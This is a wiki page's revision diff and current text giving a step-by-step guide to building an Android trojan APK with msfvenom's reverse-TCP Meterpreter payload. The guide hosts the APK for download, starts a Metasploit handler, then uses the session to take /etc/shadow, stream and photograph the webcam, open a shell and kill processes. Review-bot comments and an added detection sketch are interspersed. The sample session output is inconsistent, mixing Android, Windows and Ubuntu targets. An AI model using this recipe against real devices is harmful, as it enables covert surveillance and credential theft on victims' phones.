Metasploit trojaner android: Difference between revisions
| (13 intermediate revisions by 2 users not shown) | |||
| Zeile 12: | Zeile 12: | ||
=create Payload= | =create Payload= | ||
| − | *msfvenom -p android/meterpreter/reverse_tcp LHOST=10. | + | *cd /var/www/html/ |
| − | + | *msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.10.101 LPORT=4444 R> spiel.apk | |
=get Payload on the target computer an start= | =get Payload on the target computer an start= | ||
| − | *wget http://10. | + | *wget http://10.0.10.101/spiel.apk |
=Launch Console= | =Launch Console= | ||
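Review bot: The unchanged heading in this hunk, "=get Payload on the target computer an start=", still has "an" where "and" is meant, and it would be worth fixing in the same edit. The added lines also introduce the address 10.0.10.101 in both the msfvenom and the wget line without saying what it is; one sentence stating that it is the lab host that runs the handler and serves the file would make the section readable on its own.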
| Zeile 33: | Zeile 33: | ||
</pre> | </pre> | ||
*msf > use exploit/multi/handler | *msf > use exploit/multi/handler | ||
| − | *msf exploit(handler) > set PAYLOAD | + | *msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp |
| − | *msf exploit(handler) > set LHOST 10. | + | *msf exploit(handler) > set LHOST 10.0.10.101 |
| − | LHOST => 10. | + | LHOST => 10.0.10.101 |
| − | *msf exploit(handler) > set LPORT | + | *msf exploit(handler) > set LPORT 4444 |
| − | LPORT => | + | LPORT => 4444 |
=Start the exploits= | =Start the exploits= | ||
| Zeile 43: | Zeile 43: | ||
[*] Exploit running as background job 0. | [*] Exploit running as background job 0. | ||
| − | [*] Started reverse TCP handler on 10. | + | [*] Started reverse TCP handler on 10.0.10.101:4444 |
=Viewing the sessions= | =Viewing the sessions= | ||
| Zeile 61: | Zeile 61: | ||
[*] Starting interaction with 1... | [*] Starting interaction with 1... | ||
| − | =Metapreter | + | =Metapreter File Management= |
==pwd== | ==pwd== | ||
*meterpreter > pwd | *meterpreter > pwd | ||
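Review bot: The new heading "=Metapreter File Management=" misspells the tool name. It should read "=Meterpreter File Management=", matching the "meterpreter >" prompt in the list item directly below it.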
| Zeile 93: | Zeile 93: | ||
Webcam shot saved to: /root/PDYSnlbK.jpeg | Webcam shot saved to: /root/PDYSnlbK.jpeg | ||
| − | = | + | =Starting a Shell (No Shell Prompt)= |
*meterpreter > shell | *meterpreter > shell | ||
<pre> | <pre> | ||
| Zeile 100: | Zeile 100: | ||
</pre> | </pre> | ||
*C:\Users\xinux\Downloads> | *C:\Users\xinux\Downloads> | ||
| − | == | + | ==Examples Shell== |
*ifconfig | *ifconfig | ||
*route -n | *route -n | ||
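Review bot: The new heading "==Examples Shell==" sits directly under a context line showing a Windows prompt ("C:\Users\xinux\Downloads>"), while the commands listed beneath it ("ifconfig", "route -n") are Unix commands. State which platform the sample session was captured on, or replace the prompt line with one from the same kind of target as the commands; "Shell examples" would also read better as the heading text.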
Current revision as of 6 August 2021, 12:15
Check Android payloads
- msfvenom -l | grep android
android/meterpreter/reverse_http     Run a meterpreter server in Android. Tunnel communication over HTTP
android/meterpreter/reverse_https    Run a meterpreter server in Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp      Run a meterpreter server in Android. Connect back stager
android/meterpreter_reverse_http     Connect back to attacker and spawn a Meterpreter shell
android/meterpreter_reverse_https    Connect back to attacker and spawn a Meterpreter shell
android/meterpreter_reverse_tcp      Connect back to the attacker and spawn a Meterpreter shell
android/shell/reverse_http           Spawn a piped command shell (sh). Tunnel communication over HTTP
android/shell/reverse_https          Spawn a piped command shell (sh). Tunnel communication over HTTPS
android/shell/reverse_tcp            Spawn a piped command shell (sh). Connect back stager
create Payload
- cd /var/www/html/
- msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.10.101 LPORT=4444 R> spiel.apk
get Payload on the target computer and start
Launch Console
- msfconsole
Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing
=[ metasploit v4.16.6-dev ]
+ -- --=[ 1682 exploits - 964 auxiliary - 297 post ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- msf > use exploit/multi/handler
- msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
- msf exploit(handler) > set LHOST 10.0.10.101
LHOST => 10.0.10.101
- msf exploit(handler) > set LPORT 4444
LPORT => 4444
Start the exploits
- msf exploit(handler) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.0.10.101:4444
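From the defender's side, the delivery and callback steps above leave a trail that can be correlated: an APK fetched over plain HTTP from a bare IP address, followed by a TCP connection from the same device to that address on a different port. The following detection sketch is an added example, not part of the original wiki page; the log records, their field layout and the 15-minute window are constructed assumptions.

```python
from datetime import datetime, timedelta
import ipaddress
from urllib.parse import urlparse

# Constructed sample records (not captured traffic), reusing the page's lab
# server address. HTTP: (time, client, url). Flows: (time, src, dst, dport).
HTTP_LOG = [
    ("2021-08-06T12:00:05", "10.0.10.57", "http://10.0.10.101/spiel.apk"),
    ("2021-08-06T12:00:09", "10.0.10.58", "http://updates.example.org/app.apk"),
    ("2021-08-06T12:01:00", "10.0.10.59", "http://10.0.10.101/index.html"),
]
FLOW_LOG = [
    ("2021-08-06T12:02:30", "10.0.10.57", "10.0.10.101", 4444),
    ("2021-08-06T12:02:31", "10.0.10.58", "10.0.10.101", 4444),
    ("2021-08-06T13:30:00", "10.0.10.57", "10.0.10.101", 443),
]
WINDOW = timedelta(minutes=15)  # assumed correlation window


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def apk_downloads(http_log):
    """Yield (time, client, server, port) for .apk files fetched over plain HTTP from a bare IP."""
    for ts, client, url in http_log:
        u = urlparse(url)
        if (u.scheme == "http" and u.path.lower().endswith(".apk")
                and is_ip_literal(u.hostname or "")):
            yield datetime.fromisoformat(ts), client, u.hostname, u.port or 80


def correlate(http_log, flow_log, window=WINDOW):
    """Alert when a client connects back to its APK source on a port other than the download port."""
    alerts = []
    for t0, client, server, web_port in apk_downloads(http_log):
        for ts, src, dst, dport in flow_log:
            delay = datetime.fromisoformat(ts) - t0
            if ((src, dst) == (client, server) and dport != web_port
                    and timedelta(0) <= delay <= window):
                alerts.append({"client": client, "server": server,
                               "port": dport, "delay_s": int(delay.total_seconds())})
    return alerts


if __name__ == "__main__":
    for alert in correlate(HTTP_LOG, FLOW_LOG):
        print(alert)
```

Only the first client is flagged: the second fetched its APK from a named host, and the third flow falls outside the window.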
Viewing the sessions
- msf exploit(handler) > sessions
Active sessions
===============

  Id  Type                     Information              Connection
  --  ----                     -----------              ----------
  1   meterpreter x86/windows  shuttle\xinux @ SHUTTLE  10.81.1.91:4444 -> 10.81.70.36:50707 (10.81.70.36)
Changing the sessions
- msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
Meterpreter File Management
pwd
- meterpreter > pwd
cd
- meterpreter > cd ..
- meterpreter > cd /etc
Download
- meterpreter > download shadow
upload
- meterpreter > cd /root
- meterpreter > upload /etc/hosts
Webcam
list
- meterpreter > webcam_list
1: Integrated Camera
Live stream
- meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: XZLHwhtQ.html
[*] Streaming...
snap
- meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/PDYSnlbK.jpeg
Starting a Shell (No Shell Prompt)
- meterpreter > shell
Process 14779 created.
Channel 5 created.
- C:\Users\xinux\Downloads>
Examples Shell
- ifconfig
- route -n
- netstat -ltpn
Quit
- CTRL+c
Sysinfo
- meterpreter > sysinfo
Computer     : gustavo.xinux.lan
OS           : Ubuntu 16.04 (Linux 4.4.0-97-generic)
Architecture : x64
Meterpreter  : x64/linux
Kill a Process
- meterpreter > pkill notepad
Filtering on 'notepad'
Killing: 3240